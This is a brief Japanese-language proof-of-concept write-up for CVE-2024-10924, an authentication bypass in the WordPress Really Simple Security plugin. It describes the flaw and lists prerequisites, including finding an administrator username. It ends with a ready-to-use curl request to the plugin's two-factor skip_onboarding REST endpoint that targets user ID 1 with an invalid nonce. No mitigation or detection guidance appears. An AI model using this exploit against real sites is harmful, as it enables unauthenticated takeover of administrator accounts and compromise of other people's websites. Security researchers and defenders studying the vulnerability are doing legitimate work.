
CVE-2024-10924 は、WordPress 用 Really Simple Security プラグイン (バージョン 9.0.0 から 9.1.1.1) における重大な認証バイパスの脆弱性です。この脆弱性により、未認証の攻撃者は二要素認証 (2FA) API の欠陥を悪用して、任意のユーザー (管理者を含む) としてログインできます。
脆弱なバージョンの Really Simple Security プラグインが動作している WordPress サイト。 テスト用に Python 3.x または cURL がインストールされていること。 対象の WordPress 管理者ユーザー名 (ユーザー列挙が必要になる場合があります)。
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v